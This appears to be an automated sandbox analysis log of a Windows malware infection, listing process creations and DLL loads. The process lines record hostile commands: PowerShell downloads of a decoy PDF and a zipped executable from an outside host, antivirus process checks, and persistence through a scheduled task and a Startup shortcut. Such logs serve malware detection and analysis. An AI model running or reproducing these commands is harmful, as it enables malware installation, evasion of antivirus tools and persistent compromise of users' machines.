Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe "C:\Users\user\AppData\Local\Temp\msword\msword.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1664,i,11365846873852603877,16222139913176040509,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
